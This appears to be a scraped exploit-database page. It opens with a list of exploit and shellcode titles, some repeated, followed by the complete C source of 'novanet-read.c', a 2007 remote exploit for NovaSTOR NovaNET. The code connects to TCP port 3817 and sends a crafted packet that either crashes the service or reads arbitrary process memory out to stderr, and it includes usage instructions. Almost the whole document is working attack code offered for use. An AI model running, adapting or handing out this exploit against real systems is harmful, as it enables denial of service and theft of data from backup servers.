
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
180 lines
No EOL
4.5 KiB
C
180 lines
No EOL
4.5 KiB
C
// source: https://www.securityfocus.com/bid/39693/info
|
|
|
|
NovaStor NovaNET is prone to code-execution, denial-of-service, and information-disclosure vulnerabilities.
|
|
|
|
An attacker can exploit these issues to execute arbitrary code, access sensitive information, or crash the affected application, denying service to legitimate users. Successful attacks may result in the complete compromise of an affected computer.
|
|
|
|
NovaNET 11 and 12 are vulnerable to all of these issue; NovaBACKUP Network 13 is affected by a denial-of-service vulnerability.
|
|
|
|
/* novanet-read.c
|
|
*
|
|
* Copyright (c) 2007 by <mu-b@digit-labs.org>
|
|
*
|
|
* NovaSTOR NovaNET remote DoS + arbitrary memory read
|
|
* by mu-b - Fri Sep 14 2007
|
|
*
|
|
* - Tested on: NovaSTOR NovaNET 11.0
|
|
*
|
|
* Note: this was silently fixed in NovaBACKUP NETWORK 13.0
|
|
*
|
|
* - Private Source Code -DO NOT DISTRIBUTE -
|
|
* http://www.digit-labs.org/ -- Digit-Labs 2007!@$!
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
|
|
#include <netinet/in.h>
|
|
#include <netdb.h>
|
|
#include <string.h>
|
|
#include <unistd.h>
|
|
|
|
#define BUF_SIZE 0x92
|
|
|
|
#define NOVANET_INT_IDX 32
|
|
#define NOVANET_OFFSET 0x100EC480
|
|
#define NOVANET_CALC_INT(a) (((int) (a)-NOVANET_OFFSET-16)/sizeof (int))
|
|
#define NOVANET_SET_INT(a,b) *((unsigned int *) &a[NOVANET_INT_IDX]) = b;
|
|
#define NOVANET_TCP_PORT 3817
|
|
#define USLEEP_TIME 100000
|
|
|
|
static int
|
|
sock_send (int fd, char *src, int len)
|
|
{
|
|
int n;
|
|
if ((n = send (fd, src, len, 0)) < 0)
|
|
{
|
|
perror ("send()");
|
|
exit (EXIT_FAILURE);
|
|
}
|
|
|
|
return (n);
|
|
}
|
|
|
|
static int
|
|
sock_recv (int fd, char *dst, int len)
|
|
{
|
|
return (recv (fd, dst, len, 0));
|
|
}
|
|
|
|
static int
|
|
sockami (char *host, int port)
|
|
{
|
|
struct sockaddr_in address;
|
|
struct hostent *hp;
|
|
int fd;
|
|
|
|
if ((fd = socket (AF_INET, SOCK_STREAM, 0)) == -1)
|
|
{
|
|
perror ("socket()");
|
|
exit (EXIT_FAILURE);
|
|
}
|
|
|
|
if ((hp = gethostbyname (host)) == NULL)
|
|
{
|
|
perror ("gethostbyname()");
|
|
exit (EXIT_FAILURE);
|
|
}
|
|
|
|
memset (&address, 0, sizeof (address));
|
|
memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length);
|
|
address.sin_family = AF_INET;
|
|
address.sin_port = htons (port);
|
|
|
|
if (connect (fd, (struct sockaddr *) &address, sizeof (address)) < 0)
|
|
{
|
|
perror ("connect()");
|
|
return (-1);
|
|
}
|
|
|
|
return (fd);
|
|
}
|
|
|
|
static void
|
|
novanet_pkt_init (char *pkt)
|
|
{
|
|
char *ptr = pkt;
|
|
|
|
/* add packet header */
|
|
*ptr++ = 0x54;
|
|
*ptr++ = 0x84;
|
|
|
|
/* add padding */
|
|
memset (ptr, 0x00, 0x1E);
|
|
ptr += 0x1E;
|
|
|
|
/* add our dodgy-int */
|
|
memset (ptr, 0x69, sizeof (int));
|
|
ptr += sizeof (int);
|
|
|
|
memset (ptr, 0x00, BUF_SIZE-(ptr-pkt));
|
|
}
|
|
|
|
static void
|
|
novanet_read (char *host, void *start, void *end, int is_dos)
|
|
{
|
|
int sock, i, num_hits;
|
|
char buf[BUF_SIZE], rbuf[BUF_SIZE];
|
|
|
|
novanet_pkt_init (buf);
|
|
|
|
start = (void *) NOVANET_CALC_INT (start);
|
|
end = (void *) NOVANET_CALC_INT (end);
|
|
|
|
if (!is_dos)
|
|
printf ("start: %p end: %p\n", start, end);
|
|
|
|
num_hits = is_dos ? 1 : (end - start);
|
|
printf ("+hitting %s:%d. (%d times)\n", host, NOVANET_TCP_PORT, num_hits);
|
|
|
|
for (i = 0; i < num_hits; i++, start++)
|
|
{
|
|
sock = sockami (host, NOVANET_TCP_PORT);
|
|
if (sock == -1)
|
|
break;
|
|
|
|
NOVANET_SET_INT (buf, (is_dos ? NOVANET_CALC_INT (0xdeadbeef) : (unsigned int) start));
|
|
sock_send (sock, buf, sizeof buf);
|
|
|
|
if (!is_dos)
|
|
{
|
|
sock_recv (sock, rbuf, sizeof rbuf);
|
|
write (fileno (stderr), &rbuf[NOVANET_INT_IDX], sizeof (int));
|
|
usleep (USLEEP_TIME);
|
|
close (sock);
|
|
|
|
if (!((i + 1) % 8))
|
|
printf ("..%d", i + 1);
|
|
|
|
fflush (stdout);
|
|
}
|
|
}
|
|
|
|
printf ("\n");
|
|
}
|
|
|
|
int
|
|
main (int argc, char **argv)
|
|
{
|
|
void *start, *end;
|
|
|
|
printf ("NovaSTOR NovaNET remote DoS + arbitrary memory read\n"
|
|
"by: <mu-b@digit-labs.org>\n"
|
|
"http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n");
|
|
|
|
if ((argc % 2) == 1 ||
|
|
(argc > 3 && (sscanf (argv[2], "0x%p", &start) != 1 ||
|
|
sscanf (argv[3], "0x%p", &end) != 1)))
|
|
{
|
|
fprintf (stderr, "Usage: %s <host> [[start] [end]]\n"
|
|
"Note: not specifying [[start] [end]] results in DoS!\n\n", argv[0]);
|
|
exit (EXIT_SUCCESS);
|
|
}
|
|
|
|
if (argc > 3)
|
|
printf ("dumping from: %p -> %p (%d-bytes) to stderr\n", start, end, (int) (end - start));
|
|
|
|
novanet_read (argv[1], start, end, !(argc > 3));
|
|
|
|
return (EXIT_SUCCESS);
|
|
} |